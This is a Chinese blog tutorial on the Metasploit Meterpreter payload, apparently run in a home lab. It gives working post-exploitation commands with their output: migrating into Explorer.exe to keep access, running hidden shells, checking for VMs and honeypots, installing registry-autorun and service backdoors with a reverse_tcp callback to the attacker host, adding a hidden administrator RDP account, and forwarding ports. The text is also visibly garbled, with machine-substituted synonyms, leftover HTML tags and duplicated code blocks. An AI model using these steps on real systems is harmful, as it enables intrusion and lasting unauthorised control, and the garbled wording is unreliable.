初探Meterpreter（一）

初探Meterpreter（一）

1.Meterpreter是什么？

仅仅是驻留在内存的shellcode。。

可以或许长这个样子容貌：

它比群体的攻打才略要好一些，群体的payload是这么工作的：

Default (1)用pay<span class="operator"><span class="keyword">load</span>在被攻打者机上开一个端口A (<span class="number">2</span>)把命令行终端绑定到A上 (<span class="number">3</span>)攻打者拜访A，就与被攻打者凝滞交互</span>

123	(1)用pay<span class="operator"><span class="keyword">load</span>在被攻打者机上开一个端口A  (<span class="number">2</span>)把命令行终端绑定到A上  (<span class="number">3</span>)攻打者拜访A，就与被攻打者凝滞交互</span>

但多么的错误舛误：

Default (<span class="number">1</span>)建一个新进程，复杂被侦查 (<span class="number">2</span>)攻打者和被攻打者之间的通信是经过端口互发送数据，复杂被IDS侦查 (<span class="number">3</span>)被攻打者大约<span class="keyword">chroot</span>（change root directory），限权

123	(<span class="number">1</span>)建一个新进程，复杂被侦查  (<span class="number">2</span>)攻打者和被攻打者之间的通信是经过端口互发送数据，复杂被IDS侦查  (<span class="number">3</span>)被攻打者大约<span class="keyword">chroot</span>（change root directory），限权

meterpreter的长处：

Default (<span class="number">1</span>)纯内存，局部的需要挪用的API都是HOOK (<span class="number">2</span>)<span class="number">16</span>字节一组<span class="keyword">xor</span>加密，SSL通信封装传输 总之便是不易被创作发明，什么平台通用性，可拓展性都是妥妥的。。

123	(<span class="number">1</span>)纯内存，局部的需要挪用的API都是HOOK  (<span class="number">2</span>)<span class="number">16</span>字节一组<span class="keyword">xor</span>加密，SSL通信封装传输  总之便是不易被创作发明，什么平台通用性，可拓展性都是妥妥的。。

2.Meterpreter常用命令

基本命令：

Default background # 让meterpreter处于背景模式 sessions -i index # 预会话进行交互，index示意第一个session quit # 插手会话 shell # 获得管制台权限 irb # 封锁ruby终端

12345

background  # 让meterpreter处于背景模式  sessions -i index   # 预会话进行交互，index示意第一个session  quit  # 插手会话  shell # 获得管制台权限  irb # 封锁ruby终端

文件零碎命令：

Default cat c:\boot.ini # 检查文件模式 getwd # 检查当前工作目录 work directory upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机上 download nimeia.txt /root/Desktop/ # 下载文件到本机上 edit c:\boot.ini # 编辑文件 search -d c:\windows -f *.mdb # search 文件

123456

cat c:\boot.ini   # 检查文件模式  getwd # 检查当前工作目录 work directory  upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机上  download nimeia.txt /root/Desktop/   # 下载文件到本机上  edit c:\boot.ini  # 编辑文件  search -d c:\windows -f *.mdb # search 文件

网络命令：

Default ipconfig / ifconfig # 检查网络接口动静 portfwd add -l 5555 -p 3389 -r 192.168.198.129 # 端口转发，本机监听5555，把目标机3389转到本机5555 root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555 route # 获取路由表动静

1234	ipconfig / ifconfig # 检查网络接口动静  portfwd  add -l 5555 -p 3389 -r 192.168.198.129 # 端口转发，本机监听5555，把目标机3389转到本机5555  root@bt:~#  rdesktop -u Administrator -p 123qwe 127.0.0.1:5555  route # 获取路由表动静

零碎命令：

Default ps # 检查当前烦闷进程 migrate pid # 将Meterpreter会话移植到进程数位pid的进程中 execute -H -i -f cmd.exe # 成立新进程cmd.exe，-H不可见，-i交互 getpid # 获取当前进程的pid kill pid # 杀死进程 getuid # 检查权限 sysinfo # 检查目标机零碎动静，如凝滞名，操纵零碎等 shutdown # 关机

12345678

ps # 检查当前烦闷进程  migrate  pid # 将Meterpreter会话移植到进程数位pid的进程中  execute -H -i -f cmd.exe # 成立新进程cmd.exe，-H不可见，-i交互  getpid # 获取当前进程的pid  kill pid # 杀死进程  getuid # 检查权限  sysinfo # 检查目标机零碎动静，如凝滞名，操纵零碎等  shutdown # 关机

写到这，咱们给命令们排个龙虎榜吧：

第一名：ps + migrate ，由于咱们是经过IE出去的，假如IE关掉了呢？假如它再也不拜访那个hook页面了，咱们岂不是再也get不了shell了。。

所以该当早早移植到别的进程空间，如Explorer.exe，这它不去关掉吧。。

第二名：execute ，能cmd.exe

第三名：portfwd ，端口转发，理论中基本都是要转发的~

看官们，假如你分歧意我的看法，也许批驳，公布下你的观点哦~~

3.Meterpreter与后渗透攻打模块

不绝认为 Meterpreter == Metasploit后渗透攻打模块，下场不是多么的。

科普下Metasploit渗透测试平台的形成：

Default AUX扶助模块 动静收集 Exploit模块 渗透攻打 后渗透模块 主机管制与拓展攻打的渗透测试全进程支持

123	AUX扶助模块    动静收集   Exploit模块    渗透攻打  后渗透模块     主机管制与拓展攻打的渗透测试全进程支持

Meterpreter 是Metasploit的一个payload，只是比较强大不少而已。它与后渗透模块的相关便是，前者是后者的 施行通道 。

后攻打模块独霸ruby写的，目标机上很大约没有ruby表白器，那怎么玩？

1)测试是不是假造机：

Default meterpreter > run post/windows/gather/checkvm [*] Checking if EMASTER-8G5WOLV is a Virtual Machine ..... [*] This is a VMware Virtual Machine

1234	meterpreter > run post/windows/gather/checkvm    [*] Checking if EMASTER-8G5WOLV is a Virtual Machine .....  [*] This is a VMware Virtual Machine

假如是假造机，热情就降落了。。

也很大约是蜜罐。。

2)布置后门行动一：

Default meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.108 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443 [*] Persistent agent script is 609628 bytes long [+] Persistent Script written to C:WINDOWSTEMPlOFkqsGGtNr.vbs [*] Executing script C:WINDOWSTEMPlOFkqsGGtNr.vbs [+] Agent executed with PID 1888 [*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRuntTCmdZkXLp [+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRuntTCmdZkXLp

12345678910

meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.108  [*] Running Persistance Script  [*] Resource file for cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc  [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443  [*] Persistent agent script is 609628 bytes long  [+] Persistent Script written to C:WINDOWSTEMPlOFkqsGGtNr.vbs  [*] Executing script C:WINDOWSTEMPlOFkqsGGtNr.vbs  [+] Agent executed with PID 1888  [*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRuntTCmdZkXLp  [+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRuntTCmdZkXLp

此后它就在目标机的C:/windows/Temp/下建立一个vbs文件，开机会带动这个文件

下面的vbs险些具有，而且开机带动也有，可是便是有：

这个标题，百度后创作发明都是说泛起这环境是中毒中马，此后教自己删东东，删自带动。。

为何meterpreter出品的东西会在xp下这么复杂暴露呢？

追查了下，NTVDM是win 16假造机的一局部，是win 为了向下兼容16位程序的假造机。

可是还是提到这么回事？

这里留个坑吧，路过的大神，假如看到，也许给我回覆吗？

3)布置后门行动二：

Default meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:DOCUME~1ADMINI~1LOCALS~1TempJszPreYrwkWEm... [*] >> Uploading metsrv.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. meterpreter >

123456789101112

meterpreter > run metsvc  [*] Creating a meterpreter service on port 31337  [*] Creating a temporary installation directory C:DOCUME~1ADMINI~1LOCALS~1TempJszPreYrwkWEm...  [*]  >> Uploading metsrv.dll...  [*]  >> Uploading metsvc-server.exe...  [*]  >> Uploading metsvc.exe...  [*] Starting the service...       * Installing service metsvc   * Starting service  Service metsvc successfully installed.   meterpreter >

监听：31337

上传了三个dll文件

此后就在目标凝滞上多了一个 自带动的就事：Meterpreter。。。

?

此后联接：

Default msf exploit(handler) > use exploit/multi/handler msf exploit(handler) > set payload windows/metsvc_bind_tcp payload => windows/metsvc_bind_tcp msf exploit(handler) > set RHOST 192.168.0.111 msf exploit(handler) > set LPORT 31337 RHOST => 192.168.0.111 LPORT => 31337 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... [*] Meterpreter session 1 opened (192.168.0.108:39406 -> 192.168.0.111:31337) at 2013-12-06 14:24:29 +0800 meterpreter >

1234567891011121314

msf  exploit(handler) > use exploit/multi/handler   msf  exploit(handler) > set payload windows/metsvc_bind_tcp   payload => windows/metsvc_bind_tcp  msf  exploit(handler) > set RHOST 192.168.0.111  msf  exploit(handler) > set LPORT 31337  RHOST => 192.168.0.111  LPORT => 31337  msf  exploit(handler) > exploit   [*] Started bind handler  [*] Starting the payload handler...  [*] Meterpreter session 1 opened (192.168.0.108:39406 -> 192.168.0.111:31337) at 2013-12-06 14:24:29 +0800   meterpreter >

感觉没什么用，随意率性是建立账户+插手组：”Remote Desktop Users” 和 “Administrators”，此后3389联接，假如内网就portfwd。。

这里的没什么用还得背后必须封锁了3389。。

Default meterpreter > run getgui -u aa -p 123qwe

1	meterpreter > run getgui -u aa -p 123qwe

假如没出标题的话，该当是添加了用户aa，密码为123qwe，并把它插手到那两个组中。。

此后：

Default msf exploit(handler) > rdesktop -u aa -p 123qwe 192.168.0.111:3389

1	msf  exploit(handler) > rdesktop -u aa -p 123qwe 192.168.0.111:3389

连上~

假如在内网，那末就先端口转发：

Default portfwd add -l 5555 -p 3389 -r 192.168.0.111 # 端口转发，本机监听5555，把目标机3389转到本机5555 root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555

12	portfwd  add -l 5555 -p 3389 -r 192.168.0.111 # 端口转发，本机监听5555，把目标机3389转到本机5555  root@bt:~#  rdesktop -u Administrator -p 123qwe 127.0.0.1:5555

via@【 emaster 】